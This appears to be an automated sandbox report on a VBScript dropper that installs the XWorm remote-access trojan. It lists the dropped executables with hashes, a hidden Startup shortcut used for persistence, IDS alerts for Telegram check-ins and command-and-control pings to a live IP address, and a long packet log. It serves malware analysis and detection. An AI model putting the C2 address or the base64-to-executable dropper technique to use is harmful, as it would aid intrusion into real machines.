                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.0.4.<./.P.i.

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FC6.tmp.xml

                                                  Download File
                                                  Process:C:\Windows\System32\WerFault.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4772
                                                  Entropy (8bit):4.443261669916678
                                                  Encrypted:false
                                                  SSDEEP:48:cvIwWl8zsvJg771I9C9WpW8VYYYm8M4J/3F4yq8vNeAHP2BZd:uIjfRI7tM7VIJ6W1HP2BZd
                                                  MD5:6257EAB639236028324D5A1517477509
                                                  SHA1:E962DE70803B8DB8AF82F25783F9FECF4FCA648C
                                                  SHA-256:9AD766448D5452CCA8C55C911A4B1099652C4692F2C8EA5779023426E0053399
                                                  SHA-512:0F0872CF8724807C4CD638E6CBA1B33872A160FB5E9B08D1A5A95E1E9EA669C72AACED2A37AB8DCB12D17BE5832FA310D81CE8ECA1C824C0F03CF7C06C4D6C66
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="531804" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\task.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\task.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Temp\Log.tmp

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\WindowsApp.exe
                                                  File Type:Generic INItialization configuration [WIN]
                                                  Category:modified
                                                  Size (bytes):64
                                                  Entropy (8bit):3.6722687970803873
                                                  Encrypted:false
                                                  SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                  MD5:DE63D53293EBACE29F3F54832D739D40
                                                  SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                  SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                  SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                  Malicious:false
                                                  Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

                                                  C:\Users\user\AppData\Local\Temp\WindowsApp.exe

                                                  Download File
                                                  Process:C:\Windows\System32\wscript.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):220160
                                                  Entropy (8bit):7.837208956478675
                                                  Encrypted:false
                                                  SSDEEP:6144:Ea2q0ShjvylwVJMRNKvXo1zKENuKOmFUA23:hDhj6lwmQvY1zJNuIGl3
                                                  MD5:0C3A47BC813554D40583861DDCDE06B8
                                                  SHA1:3D8E14459F4C0402A8C9DCA0F4336BFE9A9F5A5C
                                                  SHA-256:27F0C4307847174E4D202AC189C9D316EE72451A0B6D5338EB6F3276D5C5ADFA
                                                  SHA-512:6A049F521892AD387466616F774763A6FD522605E0E3B21D6B18E8AFA7644D92B1DE8739F62C584AACAEC9A043383EDD340707C5CC200E5027F5583E2E85CC67
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.g.........."...0...................... ....@.. ....................................@.................................."..K.......................................................................................................H...........dCoc.B{...... ......................@....text... ........................... ..`.rsrc................R..............@..@.....................X.............. ..`.reloc...............Z..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\task.lnk

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\WindowsApp.exe
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 6 13:45:08 2024, mtime=Sun Oct 6 13:45:08 2024, atime=Sun Oct 6 13:45:08 2024, length=220160, window=hide
                                                  Category:dropped
                                                  Size (bytes):751
                                                  Entropy (8bit):5.066900684635211
                                                  Encrypted:false
                                                  SSDEEP:12:8nbMO4HTN+2ChCi1Y//Y8LHGjAgiNHldYJUJzBmV:86Hw219naA1YJUJtm
                                                  MD5:C5B2FAEE5659A058EB72F76ED58097B6
                                                  SHA1:3489CC42541D3A2DBF871519A61B4BA7EB53F909
                                                  SHA-256:2617B945A4DA62FFC16A60F363A115B2711E99482B5D5CFBA6A755195EF087EA
                                                  SHA-512:640C1CC090084459C5FCE8DB601EA16EE4F002CD4AE20706EFB3C8BD284D1EB34942B6AC6AB39B516A8E102DE0AE7C6FDEF6B828C1F219AB31654E5ACF4B0139
                                                  Malicious:false
                                                  Preview:L..................F.... .../.,W..../.,W..../.,W.....\......................n.:..DG..Yr?.D..U..k0.&...&......Qg.*_...?.[M....<,.W........t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=FY.u..........................3*N.A.p.p.D.a.t.a...B.V.1.....FY.u..Roaming.@......EW.=FY.u..........................V...R.o.a.m.i.n.g.....Z.2..\..FY.u .task.exe..B......FY.uFY.u....6.........................t.a.s.k...e.x.e.......Z...............-.......Y..............N.....C:\Users\user\AppData\Roaming\task.exe........\.....\.....\.....\.....\.t.a.s.k...e.x.e.`.......X.......932923...........hT..CrF.f4... ..../Tc...,......hT..CrF.f4... ..../Tc...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                  C:\Users\user\AppData\Roaming\task.exe

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\WindowsApp.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):220160
                                                  Entropy (8bit):7.837208956478675
                                                  Encrypted:false
                                                  SSDEEP:6144:Ea2q0ShjvylwVJMRNKvXo1zKENuKOmFUA23:hDhj6lwmQvY1zJNuIGl3
                                                  MD5:0C3A47BC813554D40583861DDCDE06B8
                                                  SHA1:3D8E14459F4C0402A8C9DCA0F4336BFE9A9F5A5C
                                                  SHA-256:27F0C4307847174E4D202AC189C9D316EE72451A0B6D5338EB6F3276D5C5ADFA
                                                  SHA-512:6A049F521892AD387466616F774763A6FD522605E0E3B21D6B18E8AFA7644D92B1DE8739F62C584AACAEC9A043383EDD340707C5CC200E5027F5583E2E85CC67
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.g.........."...0...................... ....@.. ....................................@.................................."..K.......................................................................................................H...........dCoc.B{...... ......................@....text... ........................... ..`.rsrc................R..............@..@.....................X.............. ..`.reloc...............Z..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  Static File Info

                                                  General

                                                  File type:ASCII text, with very long lines (65377), with CRLF line terminators
                                                  Entropy (8bit):5.968728386673498
                                                  TrID:
                                                    File name:SOA-injazfe-10424.vbs
                                                    File size:294'802 bytes
                                                    MD5:d1d114a2cb6d4a5fcc20e0db06755948
                                                    SHA1:eafdcba5d2d41934ae19628ac35675f7fce924c1
                                                    SHA256:f71d04f863721491823b5ed2b83d2f30d67084025bf7ea9fc52c615ba0fd3040
                                                    SHA512:5473b2c0b0263934fcd6ac9e712b09830df32ee61a5829ab6bfed2f634044124c13ca20157f3cf6634e90fe5192f44efd07e1fef6cd649907e09b6ed9879bb8e
                                                    SSDEEP:6144:4J6ej/Tyn/Jx+tJKE5FrWbd7Jq11BpXt4ag:Jm/TyCJlroU11B85
                                                    TLSH:9954BE318804BA1FCEEF2F9775141FD37CB8293BCE551428A84F49B95A68234297BF60
                                                    File Content Preview:Const XML_TYPE = "MSXML2.DOMDocument"..Const ELEMENT_TYPE = "text"..Const DATA_TYPE = "bin.base64"....Dim base64EncodedString, tempFolderPath, executablePath..base64EncodedString = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                    File Icon

                                                    Icon Hash:68d69b8f86ab9a86

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-10-06T16:45:11.941778+02002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.749701149.154.167.220443TCP
                                                    2024-10-06T16:45:51.394858+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.74949445.88.91.1477000TCP
                                                    2024-10-06T16:46:25.707078+02002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.74962145.88.91.1477000TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 6, 2024 16:45:08.403634071 CEST4969980192.168.2.7208.95.112.1
                                                    Oct 6, 2024 16:45:08.408487082 CEST8049699208.95.112.1192.168.2.7
                                                    Oct 6, 2024 16:45:08.408565044 CEST4969980192.168.2.7208.95.112.1
                                                    Oct 6, 2024 16:45:08.409285069 CEST4969980192.168.2.7208.95.112.1
                                                    Oct 6, 2024 16:45:08.415838003 CEST8049699208.95.112.1192.168.2.7
                                                    Oct 6, 2024 16:45:08.869294882 CEST8049699208.95.112.1192.168.2.7
                                                    Oct 6, 2024 16:45:08.925240040 CEST4969980192.168.2.7208.95.112.1
                                                    Oct 6, 2024 16:45:10.872031927 CEST49701443192.168.2.7149.154.167.220
                                                    Oct 6, 2024 16:45:10.872076035 CEST44349701149.154.167.220192.168.2.7
                                                    Oct 6, 2024 16:45:10.872181892 CEST49701443192.168.2.7149.154.167.220
                                                    Oct 6, 2024 16:45:10.929267883 CEST49701443192.168.2.7149.154.167.220
                                                    Oct 6, 2024 16:45:10.929284096 CEST44349701149.154.167.220192.168.2.7
                                                    Oct 6, 2024 16:45:11.561496973 CEST44349701149.154.167.220192.168.2.7
                                                    Oct 6, 2024 16:45:11.561616898 CEST49701443192.168.2.7149.154.167.220
                                                    Oct 6, 2024 16:45:11.565637112 CEST49701443192.168.2.7149.154.167.220
                                                    Oct 6, 2024 16:45:11.565649986 CEST44349701149.154.167.220192.168.2.7
                                                    Oct 6, 2024 16:45:11.565978050 CEST44349701149.154.167.220192.168.2.7
                                                    Oct 6, 2024 16:45:11.612472057 CEST49701443192.168.2.7149.154.167.220
                                                    Oct 6, 2024 16:45:11.625113964 CEST49701443192.168.2.7149.154.167.220
                                                    Oct 6, 2024 16:45:11.671406984 CEST44349701149.154.167.220192.168.2.7
                                                    Oct 6, 2024 16:45:11.941915989 CEST44349701149.154.167.220192.168.2.7
                                                    Oct 6, 2024 16:45:11.942095041 CEST44349701149.154.167.220192.168.2.7
                                                    Oct 6, 2024 16:45:11.942148924 CEST49701443192.168.2.7149.154.167.220
                                                    Oct 6, 2024 16:45:11.953571081 CEST49701443192.168.2.7149.154.167.220
                                                    Oct 6, 2024 16:45:12.107999086 CEST497127000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:45:12.112803936 CEST70004971245.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:45:12.112915039 CEST497127000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:45:12.161710024 CEST497127000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:45:12.166778088 CEST70004971245.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:45:24.820848942 CEST497127000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:45:24.825754881 CEST70004971245.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:45:33.688196898 CEST70004971245.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:45:33.688258886 CEST497127000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:45:33.690486908 CEST70004971245.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:45:33.690552950 CEST497127000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:45:36.987730026 CEST497127000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:45:36.989156961 CEST494947000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:45:36.993815899 CEST70004971245.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:45:36.993999958 CEST70004949445.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:45:36.994090080 CEST494947000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:45:37.010667086 CEST494947000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:45:37.015470982 CEST70004949445.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:45:51.293524981 CEST8049699208.95.112.1192.168.2.7
                                                    Oct 6, 2024 16:45:51.293623924 CEST4969980192.168.2.7208.95.112.1
                                                    Oct 6, 2024 16:45:51.394857883 CEST494947000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:45:51.399817944 CEST70004949445.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:45:58.393225908 CEST70004949445.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:45:58.393357992 CEST494947000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:00.019161940 CEST494947000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:00.024650097 CEST70004949445.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:00.030081987 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:00.034873962 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:00.034945965 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:00.055135012 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:00.061414957 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:09.395214081 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:09.400008917 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:09.457082033 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:09.461899042 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:09.831866980 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:09.836785078 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:10.472939968 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:10.479165077 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:10.660299063 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:10.972317934 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:11.559627056 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:11.559640884 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:11.597732067 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:11.602886915 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:11.675589085 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:11.686686039 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:11.816214085 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:11.821443081 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:12.097532988 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:12.102534056 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:12.144304991 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:12.149291039 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:12.207009077 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:12.211954117 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:13.347594023 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:13.352777004 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:13.519676924 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:13.524482965 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:13.535048962 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:13.539823055 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:13.597610950 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:13.602420092 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:13.613343000 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:13.618175030 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:13.660185099 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:13.664932013 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:13.722795963 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:13.727650881 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:13.769433022 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:13.774208069 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:13.785273075 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:13.790034056 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:13.800652981 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:13.805460930 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:13.816169024 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:13.820914030 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:13.847417116 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:13.852246046 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:13.863107920 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:13.867959976 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:13.894393921 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:13.899174929 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:13.925721884 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:13.930545092 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:14.097582102 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:14.102427959 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:14.144403934 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:14.149203062 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:14.175677061 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:14.180490017 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:14.191272020 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:14.196008921 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:14.206864119 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:14.211786985 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:14.253639936 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:14.259035110 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:14.425658941 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:14.430706024 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:15.410058022 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:15.414866924 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:15.472771883 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:15.477535963 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:15.769886017 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:15.774949074 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:16.270528078 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:16.275438070 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:16.363645077 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:16.368571043 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:16.535171986 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:16.540074110 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:17.519624949 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:17.524465084 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:18.238339901 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:18.243325949 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:18.269450903 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:18.274179935 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:18.332031965 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:18.340907097 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:18.410497904 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:18.415497065 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.269495010 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.274794102 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.535090923 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.539896965 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.550592899 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.555429935 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.597728968 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.603082895 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.660255909 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.665051937 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.722755909 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.727566957 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.738352060 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.743153095 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.769999981 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.774759054 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.925769091 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.930634975 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:19.941370964 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:19.946312904 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:20.019644976 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:20.041621923 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:20.363481045 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:20.368288994 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:20.426141977 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:20.430919886 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:21.332346916 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:21.338227034 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:21.404218912 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:21.404359102 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:24.973277092 CEST496207000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:24.977283001 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:24.978111029 CEST70004962045.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:24.982543945 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:24.985399961 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.010416031 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.015376091 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.691560030 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.704611063 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.707077980 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.711939096 CEST70004962145.88.91.147192.168.2.7
                                                    Oct 6, 2024 16:46:25.769673109 CEST496217000192.168.2.745.88.91.147
                                                    Oct 6, 2024 16:46:25.775032997 CEST70004962145.88.91.147192.168.2.7
